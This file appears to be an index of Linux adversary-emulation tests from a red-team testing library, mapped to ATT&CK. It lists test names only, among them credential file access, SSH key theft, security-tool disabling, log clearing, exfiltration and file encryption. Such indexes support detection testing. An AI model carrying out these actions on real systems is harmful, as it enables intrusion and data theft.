persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1003.008 /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
3 credential-access T1003.008 /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
4 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
5 credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
6 credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
7 credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
8 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
9 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
10 credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
11 credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
12 credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
13 credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
14 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
15 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
16 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
17 credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
18 credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
19 collection T1560.002 Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
20 collection T1560.002 Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
21 collection T1560.002 Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
22 collection T1560.002 Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
23 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
24 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
25 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
26 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
27 collection T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
28 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
29 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
30 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
31 privilege-escalation T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
32 privilege-escalation T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
33 privilege-escalation T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
34 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
35 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
36 privilege-escalation T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
37 privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
38 privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
39 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
40 privilege-escalation T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
41 privilege-escalation T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
42 privilege-escalation T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
43 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
44 privilege-escalation T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
45 privilege-escalation T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
46 privilege-escalation T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
47 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
48 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
49 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
50 privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
51 privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
52 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
53 privilege-escalation T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
54 privilege-escalation T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
55 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
56 defense-evasion T1070.003 Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
57 defense-evasion T1070.003 Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
58 defense-evasion T1070.003 Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
59 defense-evasion T1070.003 Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
60 defense-evasion T1070.003 Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
61 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
62 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
63 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
64 defense-evasion T1070.003 Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
65 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
66 defense-evasion T1070.002 Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
67 defense-evasion T1070.002 Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
68 defense-evasion T1610 Deploy Container 1 Deploy container using nsenter container escape 58004e22-022c-4c51-b4a8-2b85ac5c596b sh
69 defense-evasion T1562.004 Disable or Modify System Firewall 1 Disable firewall 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 sh
70 defense-evasion T1562.001 Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
71 defense-evasion T1562.001 Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
72 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
73 defense-evasion T1562.001 Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
74 defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
75 defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
76 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
77 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
78 defense-evasion T1070.004 File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
79 defense-evasion T1070.004 File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
80 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
81 defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
82 defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
83 defense-evasion T1562.006 Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
84 defense-evasion T1562.006 Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
85 defense-evasion T1553.004 Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
86 defense-evasion T1553.004 Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
87 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
88 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
89 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
90 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
91 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
92 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
93 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
94 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
95 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
96 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
97 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
98 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
99 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
100 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
101 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
102 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
103 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
104 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
105 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
106 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
107 defense-evasion T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
108 defense-evasion T1070.006 Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
109 defense-evasion T1070.006 Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
110 defense-evasion T1070.006 Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
111 defense-evasion T1070.006 Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
112 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
113 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
114 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
115 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
116 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
117 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
118 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
119 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
120 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
121 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
122 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
123 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
124 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
125 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
126 discovery T1083 File and Directory Discovery 3 Nix File and Diectory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
127 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
128 discovery T1087.001 Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
129 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
130 discovery T1087.001 Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
131 discovery T1087.001 Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
132 discovery T1087.001 Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
133 discovery T1087.001 Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
134 discovery T1069.001 Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
135 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 sh
136 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
137 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
138 discovery T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
139 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
140 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
141 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
142 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
143 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
144 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
145 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
146 discovery T1518.001 Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
147 discovery T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
148 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
149 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
150 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
151 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
152 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
153 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
154 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
155 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
156 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
157 persistence T1098.001 Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
158 persistence T1098.001 Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
159 persistence T1098.001 Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
160 persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
161 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
162 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
163 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
164 persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
165 persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
166 persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
167 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
168 persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
169 persistence T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
170 persistence T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
171 persistence T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
172 persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
173 persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
174 persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
175 persistence T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
176 persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
177 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
178 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
179 persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
180 persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
181 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
182 persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
183 persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
184 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
185 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
186 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
